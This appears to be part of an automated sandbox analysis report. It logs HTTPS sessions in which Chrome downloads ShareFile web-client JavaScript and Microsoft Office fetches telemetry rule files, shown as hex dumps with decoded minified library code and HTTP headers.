                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC16384INData Raw: 26 26 22 53 68 61 72 65 46 69 6c 65 2e 41 70 69 2e 4d 6f 64 65 6c 73 2e 57 6f 72 6b 66 6c 6f 77 42 75 6e 64 6c 65 22 3d 3d 3d 65 5b 22 6f 64 61 74 61 2e 74 79 70 65 22 5d 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 53 68 61 72 65 46 69 6c 65 2e 41 70 69 2e 4d 6f 64 65 6c 73 2e 45 6e 73 53 75 62 73 63 72 69 70 74 69 6f 6e 52 65 71 75 65 73 74 22 3d 3d 3d 65 5b 22 6f 64 61 74 61 2e 74 79 70 65 22 5d 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 53 68 61 72 65 46 69 6c 65 2e 41 70 69 2e 4d 6f 64 65 6c 73 2e 45 6e 73 53 75 62 73 63 72 69 70 74 69 6f 6e 54 6f 6b 65 6e 22 3d 3d 3d 65 5b 22 6f 64 61 74 61 2e 74 79 70 65 22 5d 7d 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 72 65 74 75 72 6e 20 65 26
                                                                                                                                                                                                                                                                                Data Ascii: &&"ShareFile.Api.Models.WorkflowBundle"===e["odata.type"]}function a(e){return e&&"ShareFile.Api.Models.EnsSubscriptionRequest"===e["odata.type"]}function u(e){return e&&"ShareFile.Api.Models.EnsSubscriptionToken"===e["odata.type"]}function c(e){return e&
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC16384INData Raw: 63 6f 6d 70 72 65 73 73 3a 61 2c 6d 61 78 43 6f 6e 74 65 6e 74 4c 65 6e 67 74 68 3a 61 2c 6d 61 78 42 6f 64 79 4c 65 6e 67 74 68 3a 61 2c 62 65 66 6f 72 65 52 65 64 69 72 65 63 74 3a 61 2c 74 72 61 6e 73 70 6f 72 74 3a 61 2c 68 74 74 70 41 67 65 6e 74 3a 61 2c 68 74 74 70 73 41 67 65 6e 74 3a 61 2c 63 61 6e 63 65 6c 54 6f 6b 65 6e 3a 61 2c 73 6f 63 6b 65 74 50 61 74 68 3a 61 2c 72 65 73 70 6f 6e 73 65 45 6e 63 6f 64 69 6e 67 3a 61 2c 76 61 6c 69 64 61 74 65 53 74 61 74 75 73 3a 75 7d 3b 72 65 74 75 72 6e 20 6e 2e 66 6f 72 45 61 63 68 28 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 2e 63 6f 6e 63 61 74 28 4f 62 6a 65 63 74 2e 6b 65 79 73 28 74 29 29 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 63 5b 65 5d 7c 7c 69 2c 6f 3d 74 28 65 29 3b 6e 2e
                                                                                                                                                                                                                                                                                Data Ascii: compress:a,maxContentLength:a,maxBodyLength:a,beforeRedirect:a,transport:a,httpAgent:a,httpsAgent:a,cancelToken:a,socketPath:a,responseEncoding:a,validateStatus:u};return n.forEach(Object.keys(e).concat(Object.keys(t)),(function(e){var t=c[e]||i,o=t(e);n.
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC16384INData Raw: 65 74 20 6f 72 67 20 70 72 6f 20 73 63 68 20 22 2c 70 65 3a 22 20 63 6f 6d 20 65 64 75 20 67 6f 62 20 6d 69 6c 20 6e 65 74 20 6e 6f 6d 20 6f 72 67 20 73 6c 64 20 22 2c 70 68 3a 22 20 63 6f 6d 20 65 64 75 20 67 6f 76 20 69 20 6d 69 6c 20 6e 65 74 20 6e 67 6f 20 6f 72 67 20 22 2c 70 6b 3a 22 20 62 69 7a 20 63 6f 6d 20 65 64 75 20 66 61 6d 20 67 6f 62 20 67 6f 6b 20 67 6f 6e 20 67 6f 70 20 67 6f 73 20 67 6f 76 20 6e 65 74 20 6f 72 67 20 77 65 62 20 22 2c 70 6c 3a 22 20 61 72 74 20 62 69 61 6c 79 73 74 6f 6b 20 62 69 7a 20 63 6f 6d 20 65 64 75 20 67 64 61 20 67 64 61 6e 73 6b 20 67 6f 72 7a 6f 77 20 67 6f 76 20 69 6e 66 6f 20 6b 61 74 6f 77 69 63 65 20 6b 72 61 6b 6f 77 20 6c 6f 64 7a 20 6c 75 62 6c 69 6e 20 6d 69 6c 20 6e 65 74 20 6e 67 6f 20 6f 6c 73 7a 74
                                                                                                                                                                                                                                                                                Data Ascii: et org pro sch ",pe:" com edu gob mil net nom org sld ",ph:" com edu gov i mil net ngo org ",pk:" biz com edu fam gob gok gon gop gos gov net org web ",pl:" art bialystok biz com edu gda gdansk gorzow gov info katowice krakow lodz lublin mil net ngo olszt
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC16384INData Raw: 6e 65 77 20 69 28 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 29 3b 65 2e 70 75 73 68 28 6f 29 3b 66 6f 72 28 76 61 72 20 73 3d 6f 2e 73 65 67 6d 65 6e 74 28 29 2c 61 3d 30 3b 61 3c 73 2e 6c 65 6e 67 74 68 3b 61 2b 2b 29 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 73 5b 61 5d 26 26 74 2e 70 75 73 68 28 73 5b 61 5d 29 2c 73 5b 61 5d 26 26 72 2b 2b 7d 69 66 28 21 74 2e 6c 65 6e 67 74 68 7c 7c 21 72 29 72 65 74 75 72 6e 20 6e 65 77 20 69 28 22 22 29 3b 76 61 72 20 75 3d 6e 65 77 20 69 28 22 22 29 2e 73 65 67 6d 65 6e 74 28 74 29 3b 72 65 74 75 72 6e 22 22 21 3d 3d 65 5b 30 5d 2e 70 61 74 68 28 29 26 26 22 2f 22 21 3d 3d 65 5b 30 5d 2e 70 61 74 68 28 29 2e 73 6c 69 63 65 28 30 2c 31 29 7c 7c 75 2e 70 61 74 68 28 22 2f 22 2b 75 2e 70 61 74 68 28 29 29 2c 75 2e
                                                                                                                                                                                                                                                                                Data Ascii: new i(arguments[n]);e.push(o);for(var s=o.segment(),a=0;a<s.length;a++)"string"==typeof s[a]&&t.push(s[a]),s[a]&&r++}if(!t.length||!r)return new i("");var u=new i("").segment(t);return""!==e[0].path()&&"/"!==e[0].path().slice(0,1)||u.path("/"+u.path()),u.
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC9824INData Raw: 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 72 2c 6e 2c 6f 3d 74 68 69 73 2e 63 6c 6f 6e 65 28 29 2c 73 3d 5b 22 70 72 6f 74 6f 63 6f 6c 22 2c 22 75 73 65 72 6e 61 6d 65 22 2c 22 70 61 73 73 77 6f 72 64 22 2c 22 68 6f 73 74 6e 61 6d 65 22 2c 22 70 6f 72 74 22 5d 3b 69 66 28 74 68 69 73 2e 5f 70 61 72 74 73 2e 75 72 6e 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 55 52 4e 73 20 64 6f 20 6e 6f 74 20 68 61 76 65 20 61 6e 79 20 67 65 6e 65 72 61 6c 6c 79 20 64 65 66 69 6e 65 64 20 68 69 65 72 61 72 63 68 69 63 61 6c 20 63 6f 6d 70 6f 6e 65 6e 74 73 22 29 3b 69 66 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 69 7c 7c 28 65 3d 6e 65 77 20 69 28 65 29 29 2c 6f 2e 5f 70 61 72 74 73 2e 70 72 6f 74 6f 63 6f 6c 29 72 65 74 75 72 6e 20 6f 3b 69
                                                                                                                                                                                                                                                                                Data Ascii: o=function(e){var t,r,n,o=this.clone(),s=["protocol","username","password","hostname","port"];if(this._parts.urn)throw new Error("URNs do not have any generally defined hierarchical components");if(e instanceof i||(e=new i(e)),o._parts.protocol)return o;i


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                129192.168.2.64985513.224.189.1154432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC418OUTGET /sharefile-web/sharefiledev-client-pilet/0.8.16/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC549INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 171393
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:02 GMT
                                                                                                                                                                                                                                                                                Last-Modified: Wed, 18 Sep 2024 19:40:42 GMT
                                                                                                                                                                                                                                                                                ETag: "41e01b6ff80bcb6f70560c42ba70e4b2"
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 3b02f73dccc5077f1ad544a27a475ed6.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: MSLiUWejcNPfXKrIRfTbuPTBgWu9ps2iuDS10TIU51ZslJ8MQ_snxg==
                                                                                                                                                                                                                                                                                Age: 45980
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 63 6c 69 65 6e 74 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 69 3d 7b 7d 2c 6f 3d 7b 7d 2c 61 3d 7b 7d 2c 73 3d 7b 7d 2c 75 3d 7b 7d 2c 63 3d 7b 7d 3b 72 65 74 75 72 6e 20
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevclientpilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},i={},o={},a={},s={},u={},c={};return
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC16384INData Raw: 2c 75 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 74 79 6c 65 22 29 3b 75 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 24 2c 61 29 2c 73 26 26 6f 26 26 75 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 4b 2c 22 22 2e 63 6f 6e 63 61 74 28 6f 29 29 2c 6e 75 6c 6c 21 3d 6e 26 26 6e 2e 6e 6f 6e 63 65 26 26 28 75 2e 6e 6f 6e 63 65 3d 6e 75 6c 6c 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 6e 6f 6e 63 65 29 2c 75 2e 69 6e 6e 65 72 48 54 4d 4c 3d 65 3b 76 61 72 20 63 3d 59 28 74 29 2c 6c 3d 63 2e 66 69 72 73 74 43 68 69 6c 64 3b 69 66 28 72 29 7b 69 66 28 73 29 7b 76 61 72 20 66 3d 28 74 2e 73 74 79 6c 65 73 7c 7c 51 28 63 29 29 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 5b 22 70 72 65 70 65 6e 64 22 2c 22 70
                                                                                                                                                                                                                                                                                Data Ascii: ,u=document.createElement("style");u.setAttribute($,a),s&&o&&u.setAttribute(K,"".concat(o)),null!=n&&n.nonce&&(u.nonce=null==n?void 0:n.nonce),u.innerHTML=e;var c=Y(t),l=c.firstChild;if(r){if(s){var f=(t.styles||Q(c)).filter((function(e){if(!["prepend","p
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC16384INData Raw: 33 3d 75 3b 63 61 73 65 20 34 33 3a 75 3d 6e 2e 74 33 3b 63 61 73 65 20 34 34 3a 6e 2e 6e 65 78 74 3d 33 35 3b 62 72 65 61 6b 3b 63 61 73 65 20 34 36 3a 6e 2e 6e 65 78 74 3d 35 31 3b 62 72 65 61 6b 3b 63 61 73 65 20 34 38 3a 6e 2e 70 72 65 76 3d 34 38 2c 6e 2e 74 34 3d 6e 5b 22 63 61 74 63 68 22 5d 28 33 33 29 2c 63 2e 65 28 6e 2e 74 34 29 3b 63 61 73 65 20 35 31 3a 72 65 74 75 72 6e 20 6e 2e 70 72 65 76 3d 35 31 2c 63 2e 66 28 29 2c 6e 2e 66 69 6e 69 73 68 28 35 31 29 3b 63 61 73 65 20 35 34 3a 69 66 28 75 21 3d 3d 75 6e 64 65 66 69 6e 65 64 29 7b 6e 2e 6e 65 78 74 3d 36 30 3b 62 72 65 61 6b 7d 69 66 28 21 28 6e 2e 74 32 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 29 29 7b 6e 2e 6e 65 78 74 3d 35 39 3b 62 72 65 61 6b 7d 74 68 72 6f 77 20 6e 65 77
                                                                                                                                                                                                                                                                                Data Ascii: 3=u;case 43:u=n.t3;case 44:n.next=35;break;case 46:n.next=51;break;case 48:n.prev=48,n.t4=n["catch"](33),c.e(n.t4);case 51:return n.prev=51,c.f(),n.finish(51);case 54:if(u!==undefined){n.next=60;break}if(!(n.t2 instanceof Error)){n.next=59;break}throw new
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC14808INData Raw: 65 42 6c 6f 63 6b 50 61 72 61 6d 65 74 65 72 73 22 2c 76 61 6c 75 65 3a 28 69 3d 28 30 2c 71 2e 5a 29 28 24 28 29 2e 6d 61 72 6b 28 28 66 75 6e 63 74 69 6f 6e 20 79 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 24 28 29 2e 77 72 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 66 6f 72 28 3b 3b 29 73 77 69 74 63 68 28 6e 2e 70 72 65 76 3d 6e 2e 6e 65 78 74 29 7b 63 61 73 65 20 30 3a 72 65 74 75 72 6e 20 6e 2e 6e 65 78 74 3d 32 2c 74 68 69 73 2e 72 65 70 6c 61 63 65 42 6c 6f 63 6b 50 61 72 61 6d 65 74 65 72 73 52 61 77 28 65 2c 74 29 3b 63 61 73 65 20 32 3a 63 61 73 65 22 65 6e 64 22 3a 72 65 74 75 72 6e 20 6e 2e 73 74 6f 70 28 29 7d 7d 29 2c 79 2c 74 68 69 73 29 7d 29 29 29 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 69 2e 61 70 70 6c 79 28
                                                                                                                                                                                                                                                                                Data Ascii: eBlockParameters",value:(i=(0,q.Z)($().mark((function y(e,t){return $().wrap((function(n){for(;;)switch(n.prev=n.next){case 0:return n.next=2,this.replaceBlockParametersRaw(e,t);case 2:case"end":return n.stop()}}),y,this)}))),function(e,t){return i.apply(
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC16384INData Raw: 69 65 77 73 2f 7a 6f 6e 65 73 22 2c 6d 65 74 68 6f 64 3a 22 50 4f 53 54 22 2c 68 65 61 64 65 72 73 3a 72 2c 71 75 65 72 79 3a 6e 2c 62 6f 64 79 3a 70 28 65 2e 61 64 64 5a 6f 6e 65 54 6f 56 69 65 77 29 7d 2c 74 29 3b 63 61 73 65 20 31 38 3a 72 65 74 75 72 6e 20 69 3d 6f 2e 73 65 6e 74 2c 6f 2e 61 62 72 75 70 74 28 22 72 65 74 75 72 6e 22 2c 6e 65 77 20 6c 65 28 69 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 44 28 65 29 7d 29 29 29 3b 63 61 73 65 20 32 30 3a 63 61 73 65 22 65 6e 64 22 3a 72 65 74 75 72 6e 20 6f 2e 73 74 6f 70 28 29 7d 7d 29 2c 6c 2c 74 68 69 73 29 7d 29 29 29 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 63 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 7d 2c 7b 6b 65 79 3a 22
                                                                                                                                                                                                                                                                                Data Ascii: iews/zones",method:"POST",headers:r,query:n,body:p(e.addZoneToView)},t);case 18:return i=o.sent,o.abrupt("return",new le(i,(function(e){return D(e)})));case 20:case"end":return o.stop()}}),l,this)}))),function(e,t){return c.apply(this,arguments)})},{key:"
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC16384INData Raw: 32 39 34 39 36 37 32 39 35 29 2b 28 72 2b 6f 26 34 32 39 34 39 36 37 32 39 35 29 26 34 32 39 34 39 36 37 32 39 35 29 3c 3c 69 7c 74 3e 3e 3e 33 32 2d 69 29 2b 6e 26 34 32 39 34 39 36 37 32 39 35 7d 7d 2c 7b 6b 65 79 3a 22 66 66 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 72 2c 69 2c 6f 2c 61 2c 73 29 7b 72 65 74 75 72 6e 20 65 2e 63 6d 6e 28 6e 26 72 7c 7e 6e 26 69 2c 74 2c 6e 2c 6f 2c 61 2c 73 29 7d 7d 2c 7b 6b 65 79 3a 22 67 67 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 72 2c 69 2c 6f 2c 61 2c 73 29 7b 72 65 74 75 72 6e 20 65 2e 63 6d 6e 28 6e 26 69 7c 72 26 7e 69 2c 74 2c 6e 2c 6f 2c 61 2c 73 29 7d 7d 2c 7b 6b 65 79 3a 22 68 68 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 72 2c 69 2c 6f 2c 61 2c
                                                                                                                                                                                                                                                                                Data Ascii: 294967295)+(r+o&4294967295)&4294967295)<<i|t>>>32-i)+n&4294967295}},{key:"ff",value:function(t,n,r,i,o,a,s){return e.cmn(n&r|~n&i,t,n,o,a,s)}},{key:"gg",value:function(t,n,r,i,o,a,s){return e.cmn(n&i|r&~i,t,n,o,a,s)}},{key:"hh",value:function(t,n,r,i,o,a,
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC16384INData Raw: 6f 74 6f 74 79 70 65 3d 78 2c 73 28 50 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 2c 7b 76 61 6c 75 65 3a 78 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 29 2c 73 28 78 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 2c 7b 76 61 6c 75 65 3a 6b 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 29 2c 6b 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 70 28 78 2c 66 2c 22 47 65 6e 65 72 61 74 6f 72 46 75 6e 63 74 69 6f 6e 22 29 2c 6e 2e 69 73 47 65 6e 65 72 61 74 6f 72 46 75 6e 63 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 72 65 74 75 72 6e 21 21 74 26 26 28 74 3d 3d 3d 6b 7c 7c 22 47 65 6e 65 72 61 74 6f 72 46 75 6e 63 74 69 6f 6e 22
                                                                                                                                                                                                                                                                                Data Ascii: ototype=x,s(P,"constructor",{value:x,configurable:!0}),s(x,"constructor",{value:k,configurable:!0}),k.displayName=p(x,f,"GeneratorFunction"),n.isGeneratorFunction=function(e){var t="function"==typeof e&&e.constructor;return!!t&&(t===k||"GeneratorFunction"
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC16384INData Raw: 72 28 76 61 72 20 61 3d 32 2c 73 3d 72 2e 73 6c 69 63 65 28 6f 2c 6f 2b 61 29 2e 6a 6f 69 6e 28 6e 29 2c 75 3d 69 5b 73 5d 3b 75 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 26 26 72 2e 6c 65 6e 67 74 68 3e 6f 2b 61 3b 29 61 2b 2b 2c 75 3d 69 5b 73 3d 72 2e 73 6c 69 63 65 28 6f 2c 6f 2b 61 29 2e 6a 6f 69 6e 28 6e 29 5d 3b 69 66 28 75 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 29 72 65 74 75 72 6e 20 75 6e 64 65 66 69 6e 65 64 3b 69 66 28 6e 75 6c 6c 3d 3d 3d 75 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 69 66 28 74 2e 65 6e 64 73 57 69 74 68 28 73 29 29 7b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 75 29 72 65 74 75 72 6e 20 75 3b 69 66 28 73 26 26 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 75 5b 73 5d 29 72 65 74 75 72 6e 20 75 5b 73 5d 7d 76 61 72
                                                                                                                                                                                                                                                                                Data Ascii: r(var a=2,s=r.slice(o,o+a).join(n),u=i[s];u===undefined&&r.length>o+a;)a++,u=i[s=r.slice(o,o+a).join(n)];if(u===undefined)return undefined;if(null===u)return null;if(t.endsWith(s)){if("string"==typeof u)return u;if(s&&"string"==typeof u[s])return u[s]}var
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC16384INData Raw: 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6c 6f 61 64 26 26 22 63 75 72 72 65 6e 74 4f 6e 6c 79 22 21 3d 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6c 6f 61 64 26 26 6f 28 74 68 69 73 2e 67 65 74 53 63 72 69 70 74 50 61 72 74 46 72 6f 6d 43 6f 64 65 28 65 29 29 2c 22 63 75 72 72 65 6e 74 4f 6e 6c 79 22 21 3d 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6c 6f 61 64 26 26 6f 28 74 68 69 73 2e 67 65 74 4c 61 6e 67 75 61 67 65 50 61 72 74 46 72 6f 6d 43 6f 64 65 28 65 29 29 29 3a 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 6f 28 74 68 69 73 2e 66 6f 72 6d 61 74 4c 61 6e 67 75 61 67 65 43 6f 64 65 28 65 29 29 2c 72 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 69 6e 64 65 78 4f 66 28 65 29 3c 30 26 26 6f 28 6e 2e 66 6f 72
                                                                                                                                                                                                                                                                                Data Ascii: =this.options.load&&"currentOnly"!==this.options.load&&o(this.getScriptPartFromCode(e)),"currentOnly"!==this.options.load&&o(this.getLanguagePartFromCode(e))):"string"==typeof e&&o(this.formatLanguageCode(e)),r.forEach((function(e){i.indexOf(e)<0&&o(n.for
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC16384INData Raw: 3d 6c 5b 66 5d 2e 63 6f 6e 63 61 74 28 73 29 29 2c 75 7c 7c 6c 5b 66 5d 2e 70 75 73 68 28 73 29 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 65 2e 70 65 6e 64 69 6e 67 5b 74 5d 21 3d 3d 75 6e 64 65 66 69 6e 65 64 26 26 28 64 65 6c 65 74 65 20 65 2e 70 65 6e 64 69 6e 67 5b 74 5d 2c 65 2e 70 65 6e 64 69 6e 67 43 6f 75 6e 74 2d 2d 29 7d 28 6e 2c 65 29 2c 74 26 26 6e 2e 65 72 72 6f 72 73 2e 70 75 73 68 28 74 29 2c 30 21 3d 3d 6e 2e 70 65 6e 64 69 6e 67 43 6f 75 6e 74 7c 7c 6e 2e 64 6f 6e 65 7c 7c 28 4f 62 6a 65 63 74 2e 6b 65 79 73 28 6e 2e 6c 6f 61 64 65 64 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 5b 65 5d 7c 7c 28 61 5b 65 5d 3d 7b 7d 29 3b 76 61 72 20 74 3d 6e 2e 6c 6f 61 64 65 64 5b 65 5d 3b 74 2e 6c 65 6e 67 74 68 26 26 74
                                                                                                                                                                                                                                                                                Data Ascii: =l[f].concat(s)),u||l[f].push(s),function(e,t){e.pending[t]!==undefined&&(delete e.pending[t],e.pendingCount--)}(n,e),t&&n.errors.push(t),0!==n.pendingCount||n.done||(Object.keys(n.loaded).forEach((function(e){a[e]||(a[e]={});var t=n.loaded[e];t.length&&t


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                130192.168.2.64986113.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:22 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:22 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 404
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                                                                                                                                x-ms-request-id: dd72cb3b-401e-0016-63c2-1953e0000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241009T180522Z-185b7d577bdd4z6mz0c833nvec0000000170000000018nz6
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                131192.168.2.64986513.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:22 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
